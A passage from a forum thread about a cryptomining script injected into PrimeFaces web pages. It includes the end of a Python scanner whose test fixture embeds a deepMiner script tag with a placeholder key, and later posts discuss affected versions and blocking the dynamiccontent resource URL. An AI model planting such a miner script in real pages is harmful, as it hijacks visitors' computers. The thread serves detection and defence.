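    '<script>var miner = new deepMiner.Anonymous("PLACEHOLDER_KEY");miner.start();</script>'
    '</ui:define>\n</ui:composition>\n'
)

def build_sample_tree():
    """Write the constructed pages into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="pf_scan_")
    os.makedirs(os.path.join(root, "WEB-INF", "templates"))
    with open(os.path.join(root, "index.xhtml"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_PAGE)
    with open(os.path.join(root, "WEB-INF", "templates", "layout.xhtml"), "w", encoding="utf-8") as fh:
        fh.write(INJECTED_PAGE)
    return root

if __name__ == "__main__":
    for rel, line_no, marker in scan_xhtml_tree(build_sample_tree()):
        print(f"{rel}:{line_no}: {marker}")
```

Point it at the exploded WAR directory on the server (not the source tree) since that is where the sed commands ran.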

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 22 Jan 2018, 17:07
by froethen
PrimeFaces version 4.0.9 is also vulnerable to this attack.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 22 Jan 2018, 21:06
by Melloware
Hey guys,

I know that in 5.X I can block the URL: /javax.faces.resource/dynamiccontent.properties.xhtml

Does anyone know what that URL is for 4.X for the old PrimeResourceHandler? I have a client with an old version using 4.x that they can't afford to upgrade but need to block that pre-emptively.

Thanks in advance!